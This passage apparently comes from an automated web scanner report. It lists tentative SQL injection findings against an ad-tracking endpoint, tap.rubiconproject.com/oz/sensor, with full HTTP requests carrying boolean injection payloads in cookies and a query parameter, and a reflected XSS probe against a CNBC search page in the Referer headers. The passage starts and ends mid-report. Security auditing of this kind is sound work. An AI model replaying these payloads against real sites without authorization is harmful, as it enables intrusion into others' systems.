Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 15:11:16 GMT; Path=/
Set-Cookie: dq=46|4|42|0; Expires=Fri, 15-Jun-2012 15:11:16 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false12779497'%20or%201%3d2--%20&xt=21&k=southern+union:328,energy+transfer:312,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:122,energy:112,billion+cnbc:80,union:72,transfer:72,southern:72,please+respect:64,must+click:64,cnbc+reserves:64,cnbc+highlights:64,related+links:64,cnbc+welcomes:64,posted+yet:64,2011:56,asia+pacific:56,datetime+08:56,expiration+datetime:48,datetime+6:48,16+2011:48,2011+8:48,8+12:48,6+16:48,special+reports:48,billion:46,datetime:46,union+company:40,will+buy:40,11+billion:40,transfer+partners:40,midstream+company:40,burgeoning+u:40,large+midstream:40,will+benefit:40,energy+news:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; khaos=GOVBRMNC-I-DXQD; cd=false; dq=44|4|40|0; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%263512%3D1%262197%3D1%262579%3D1%263811%3D1%262374%3D1; rdk2=0; ses2=11953^34; csi2=2553662.js^8^1308233336^1308237059&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126; rdk=6451/11953; rdk15=0; ses15=11953^40; csi15=2553663.js^9^1308234261^1308237048&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 15:11:16 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

1.19. http://tap.rubiconproject.com/oz/sensor [csi2 cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tap.rubiconproject.com
Path:	/oz/sensor

Issue detail

The csi2 cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the csi2 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=21&k=southern+union:328,energy+transfer:312,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:122,energy:112,billion+cnbc:80,union:72,transfer:72,southern:72,please+respect:64,must+click:64,cnbc+reserves:64,cnbc+highlights:64,related+links:64,cnbc+welcomes:64,posted+yet:64,2011:56,asia+pacific:56,datetime+08:56,expiration+datetime:48,datetime+6:48,16+2011:48,2011+8:48,8+12:48,6+16:48,special+reports:48,billion:46,datetime:46,union+company:40,will+buy:40,11+billion:40,transfer+partners:40,midstream+company:40,burgeoning+u:40,large+midstream:40,will+benefit:40,energy+news:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; khaos=GOVBRMNC-I-DXQD; cd=false; dq=44|4|40|0; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%263512%3D1%262197%3D1%262579%3D1%263811%3D1%262374%3D1; rdk2=0; ses2=11953^34; csi2=2553662.js^8^1308233336^1308237059&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126'%20and%201%3d1--%20; rdk=6451/11953; rdk15=0; ses15=11953^40; csi15=2553663.js^9^1308234261^1308237048&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 15:11:57 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 15:11:57 GMT; Path=/
Set-Cookie: dq=46|4|42|0; Expires=Fri, 15-Jun-2012 15:11:57 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=21&k=southern+union:328,energy+transfer:312,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:122,energy:112,billion+cnbc:80,union:72,transfer:72,southern:72,please+respect:64,must+click:64,cnbc+reserves:64,cnbc+highlights:64,related+links:64,cnbc+welcomes:64,posted+yet:64,2011:56,asia+pacific:56,datetime+08:56,expiration+datetime:48,datetime+6:48,16+2011:48,2011+8:48,8+12:48,6+16:48,special+reports:48,billion:46,datetime:46,union+company:40,will+buy:40,11+billion:40,transfer+partners:40,midstream+company:40,burgeoning+u:40,large+midstream:40,will+benefit:40,energy+news:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; khaos=GOVBRMNC-I-DXQD; cd=false; dq=44|4|40|0; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%263512%3D1%262197%3D1%262579%3D1%263811%3D1%262374%3D1; rdk2=0; ses2=11953^34; csi2=2553662.js^8^1308233336^1308237059&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126'%20and%201%3d2--%20; rdk=6451/11953; rdk15=0; ses15=11953^40; csi15=2553663.js^9^1308234261^1308237048&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 15:11:57 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

1.20. http://tap.rubiconproject.com/oz/sensor [dq cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tap.rubiconproject.com
Path:	/oz/sensor

Issue detail

The dq cookie appears to be vulnerable to SQL injection attacks. The payloads 15011000'%20or%201%3d1--%20 and 15011000'%20or%201%3d2--%20 were each submitted in the dq cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=6&k=cnbc+search:80,script+alert:80,title+script:80,xss36c5e+title:80,script+2789f6ff334a89918:80,search+results:72,matching+symbols:64,sponsored+results:64,refine+results:64,cnbc:46,xss36c5e:40,script:40,search+result:32,refine+result:32,matching+symbol:32,sponsored+result:32,2789f6ff334a89918:24,cnbc+pro:24,title:20,alert:20,asia+pacific:16,special+reports:16,last:16,date:16,sponsored:16,matching:16,symbols:16,refine:16,format:16,cnbc+tv:16,video:14,days:12,stock+screener:8,ceo+interviews:8,earnings+front:8,special+report:8,member+center:8,fund+screener:8,symbol+lookup:8,markets+front:8,&rd=burp&t=xss36c5e HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss36c5e%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E2789f6ff334a89918&categories=exclude&searchboxinput=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=12|4|8|015011000'%20or%201%3d1--%20; rdk=6451/11953; rdk15=0; ses15=11953^2; csi15=3187871.js^1^1308225219^1308225219&3206204.js^1^1308225202^1308225202

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 12:09:12 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 12:09:12 GMT; Path=/
Set-Cookie: dq=13|4|9|15011000; Expires=Fri, 15-Jun-2012 12:09:12 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=6&k=cnbc+search:80,script+alert:80,title+script:80,xss36c5e+title:80,script+2789f6ff334a89918:80,search+results:72,matching+symbols:64,sponsored+results:64,refine+results:64,cnbc:46,xss36c5e:40,script:40,search+result:32,refine+result:32,matching+symbol:32,sponsored+result:32,2789f6ff334a89918:24,cnbc+pro:24,title:20,alert:20,asia+pacific:16,special+reports:16,last:16,date:16,sponsored:16,matching:16,symbols:16,refine:16,format:16,cnbc+tv:16,video:14,days:12,stock+screener:8,ceo+interviews:8,earnings+front:8,special+report:8,member+center:8,fund+screener:8,symbol+lookup:8,markets+front:8,&rd=burp&t=xss36c5e HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss36c5e%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E2789f6ff334a89918&categories=exclude&searchboxinput=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=12|4|8|015011000'%20or%201%3d2--%20; rdk=6451/11953; rdk15=0; ses15=11953^2; csi15=3187871.js^1^1308225219^1308225219&3206204.js^1^1308225202^1308225202

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 12:09:12 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

1.21. http://tap.rubiconproject.com/oz/sensor [k parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tap.rubiconproject.com
Path:	/oz/sensor

Issue detail

The k parameter appears to be vulnerable to SQL injection attacks. The payloads 16361420'%20or%201%3d1--%20 and 16361420'%20or%201%3d2--%20 were each submitted in the k parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=19&k=foreclosure+activity:192,real+estate:192,activity+falls:176,current+datetime:144,linkslist+documentid:144,cnbc:106,foreclosure:98,11+21:88,datetime+11:88,yet+cnbc:80,activity+fall:72,posted+yet:64,must+click:64,cnbc+welcomes:64,featured+real:64,estate+stories:64,related+links:64,please+respect:64,cnbc+reserves:64,21+58:56,58+15:56,asia+pacific:56,2011:56,activity:54,market:48,datetime:46,special+reports:40,housing+market:40,datetime+04:40,datetime+6:40,16+2011:40,2011+4:40,04+24:40,6+16:40,4+27:40,new+push:40,big+banks:40,albeit+still:40,nation's+real:40,estate+market:40,16361420'%20or%201%3d1--%20&t=Foreclosure+Activity+Falls,+but+the+Worst+Isn't+Over+Yet+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; ruid=154dd07bb6adc1d6f31bfa10^6^1307963581^2915161843; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; cd=false; dq=9|4|5|0; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%262372%3D1%263810%3D1%262374%3D1%264214%3D1; put_1197=3460050161923843111

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 11:27:27 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 11:27:27 GMT; Path=/
Set-Cookie: dq=12|4|8|0; Expires=Fri, 15-Jun-2012 11:27:27 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=19&k=foreclosure+activity:192,real+estate:192,activity+falls:176,current+datetime:144,linkslist+documentid:144,cnbc:106,foreclosure:98,11+21:88,datetime+11:88,yet+cnbc:80,activity+fall:72,posted+yet:64,must+click:64,cnbc+welcomes:64,featured+real:64,estate+stories:64,related+links:64,please+respect:64,cnbc+reserves:64,21+58:56,58+15:56,asia+pacific:56,2011:56,activity:54,market:48,datetime:46,special+reports:40,housing+market:40,datetime+04:40,datetime+6:40,16+2011:40,2011+4:40,04+24:40,6+16:40,4+27:40,new+push:40,big+banks:40,albeit+still:40,nation's+real:40,estate+market:40,16361420'%20or%201%3d2--%20&t=Foreclosure+Activity+Falls,+but+the+Worst+Isn't+Over+Yet+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; ruid=154dd07bb6adc1d6f31bfa10^6^1307963581^2915161843; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; cd=false; dq=9|4|5|0; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%262372%3D1%263810%3D1%262374%3D1%264214%3D1; put_1197=3460050161923843111

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 11:27:27 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

1.22. http://tap.rubiconproject.com/oz/sensor [khaos cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tap.rubiconproject.com
Path:	/oz/sensor

Issue detail

The khaos cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the khaos cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=19&k=foreclosure+activity:192,real+estate:192,activity+falls:176,current+datetime:144,linkslist+documentid:144,cnbc:106,foreclosure:98,11+21:88,datetime+11:88,yet+cnbc:80,activity+fall:72,posted+yet:64,must+click:64,cnbc+welcomes:64,featured+real:64,estate+stories:64,related+links:64,please+respect:64,cnbc+reserves:64,21+58:56,58+15:56,asia+pacific:56,2011:56,activity:54,market:48,datetime:46,special+reports:40,housing+market:40,datetime+04:40,datetime+6:40,16+2011:40,2011+4:40,04+24:40,6+16:40,4+27:40,new+push:40,big+banks:40,albeit+still:40,nation's+real:40,estate+market:40,&t=Foreclosure+Activity+Falls,+but+the+Worst+Isn't+Over+Yet+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; ruid=154dd07bb6adc1d6f31bfa10^6^1307963581^2915161843; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; cd=false; dq=9|4|5|0; khaos=GOVBRMNC-I-DXQD'%20and%201%3d1--%20; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%262372%3D1%263810%3D1%262374%3D1%264214%3D1; put_1197=3460050161923843111

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 11:27:55 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 11:27:56 GMT; Path=/
Set-Cookie: dq=12|4|8|0; Expires=Fri, 15-Jun-2012 11:27:56 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=19&k=foreclosure+activity:192,real+estate:192,activity+falls:176,current+datetime:144,linkslist+documentid:144,cnbc:106,foreclosure:98,11+21:88,datetime+11:88,yet+cnbc:80,activity+fall:72,posted+yet:64,must+click:64,cnbc+welcomes:64,featured+real:64,estate+stories:64,related+links:64,please+respect:64,cnbc+reserves:64,21+58:56,58+15:56,asia+pacific:56,2011:56,activity:54,market:48,datetime:46,special+reports:40,housing+market:40,datetime+04:40,datetime+6:40,16+2011:40,2011+4:40,04+24:40,6+16:40,4+27:40,new+push:40,big+banks:40,albeit+still:40,nation's+real:40,estate+market:40,&t=Foreclosure+Activity+Falls,+but+the+Worst+Isn't+Over+Yet+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
